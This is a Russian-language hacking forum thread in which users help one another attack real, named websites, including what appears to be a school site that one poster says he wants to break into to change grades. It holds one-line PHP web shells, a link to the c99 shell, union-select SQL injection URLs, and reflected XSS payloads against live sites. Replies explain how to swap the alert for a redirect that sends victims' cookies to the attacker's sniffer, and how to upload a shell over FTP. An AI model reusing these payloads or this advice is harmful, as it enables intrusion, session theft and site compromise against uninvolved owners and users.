Ваши вопросы по уязвимостям.

Я все делал по статье. все верно.
Еще выяснил, что при любом запросе:
админ:админ.
лол:кол

выбрасывает на ошибку. Может такое быть, что авторизоваться не получится?

 

Warning: require_once(maincore.php) [function.require-once]: failed to open stream: Operation not permitted in /www/hmarka.net/3/8/38school/home/site/news.php on line 12

Fatal error: require_once() [function.require]: Failed opening required 'maincore.php' (include_path='.:/usr/share/php') in /www/hmarka.net/3/8/38school/home/site/news.php on line 12

ето че такое и как етим воспользоваться???

 

увидеть пути ..
возрадоватся что ошибки не отключены в этом скрипте, и возможно на всём сайте, что очень облегчит дальнейший взлом..

 

круто а вот че мне делать дальш???

 

попрыгать на левой ноге, сьесть яйцо в смятку, выпить пол литру молока, подтянутся 23 раза и зайти на php.net и mysql.com .. почитать ..
также рекомендуется зайти в раздел /forum30.html и тоже почитать ..

--------
.зы из ошибки, я понял что это нечто типо сайта школы /38school/
Не стоит ломать с надеждой поменять себе отметки!

 

Почитай, может поможет:

Code:

http://forum.antichat.ru/thread91807.html

 

_http://www.vs.motorolka.ru/forum/index.php?showtopic=-1+limit+1,1+union+select+1,2,3--
интересует скули такого вида..их ведь так крутить надо?сначала лимит,а потом юбнион+целест?

 

да ты прав))) Отметки потом сменю у меня и у всей школе протест!!! Они нас в школе запирают и не выпускают некуда токо после уроков всех(((( Взломаю потом я его задосил с деда)))

 

вопрос может не в тему но нужен шел))) на форуме ищу никак ненайду что найду непашут ссылки(( выложите кто-то

 

<?passthru($_GET[cmd]);?>

 

PHP:

<?=@`$c`?>

short_open_tag и register_globals required=\

(c) Raz0r

 

c99comandshell
http://madnet.name/files/1/10.html

 

Вопрос по xss

Нашёл пару xss ,но не могу понять как составить ссылку с адресом сниффера.Помогите,я туплю)

http://www.club-nissan.ru/cars/models/Nissan_Stagea/'"></title><script>alert(1337)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>

собственно вставка вместо алерта запроса на снифер,вида

<script>img = new Image(); img.src = "блаблабла?"+document.cookie;</script>

не пашет((


В благодарность за ваши советы вот ещё xss (будет супер,если ктонить объяснит как составить ссылки на сниф,т.к. в следующих ,подстановка по методу выше тоже не пашет)

http://www.blogus.ru/tagposts.aspx?id=%D0%B7%D0%B0%D0%B2%D0%BE%D0%B4"><script>alert(document.cookie)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>

http://userinfo.ru/sites/'"></title><script>alert(1337)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>

http://moemesto.ru/link/1094798'"></title><script>alert(1337)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>

http://extremetracking.com/open;ref2?login=magwheel"><script>alert(document.cookie)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>

 

http://www.club-nissan.ru/cars/models/Nissan_Stagea/'"></title><script>alert(1337)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>

не работает по ЭТОЙ ссылке xss

http://www.blogus.ru/tagposts.aspx?id=%D0%B7%D0%B0%D0%B2%D0%BE%D0%B4"><script>alert(document.cookie)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>

тут всместо alert(document.cookie) просто вставь

window.location.href='http://твой_сайт_со_снифером/s.phpf?'+document.cookie;

тут

http://userinfo.ru/sites/'"></title><script>alert(1337)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>

нет xss

тут

http://moemesto.ru/link/1094798'"></title><script>alert(1337)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>

нет xss

тут

http://extremetracking.com/open;ref2?login=magwheel"><script>alert(document.cookie)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>

нет xss

 

хммм. у меня в IE алерт вылезает по всем ссылкам

 

и что, а у меня опера, xss с расчетом на один браузер - гопота. Ну если так хочется надеятся, что чел, кому ты скинешь ссылку, содержащую пассивную xss, будет именно в осле сидеть, то делай тоже самое:

вместо alert(document.cookie) просто вставь

window.location.href='http://твой_сайт_со_снифером/s.phpf?'+document.cookie;

 

Помогите с одной проблемой пожалста,

Fatal error: Cannot use object of type DB_Error as array in /home/shytobuy/domains/shytobuy.com/public_html/product.php on line 85

есть сайт, подобрал к нему колличество колонок, походу правильное потомучто если добавить еще одну ошибка меняется на вот такую

Fatal error: Cannot use object of type DB_Error as array in /home/shytobuy/domains/shytobuy.com/public_html/lib/site_common.php on line 123

сам запрос выглядит вот так

http://www.shytobuy.com/product.php?prod_id=1316+union+select+null,null,null,null,null,null,null/*

проблема в том что сайт не дает добро ни на какое количество колонок, постоянно выводится ошибка, как с этим можно бороться и что вообще можно тут придумать...

спасибо за ответы

 

У меня есть достук к фтп (логин пасс) заливать надо етот шел туда c99comandshell???

 

залил а оно не заходит туда(((
Forbidden
You don't have permission to access /shell on this server.

вот че пишет

 

права поменяй иль залей в др. папку ..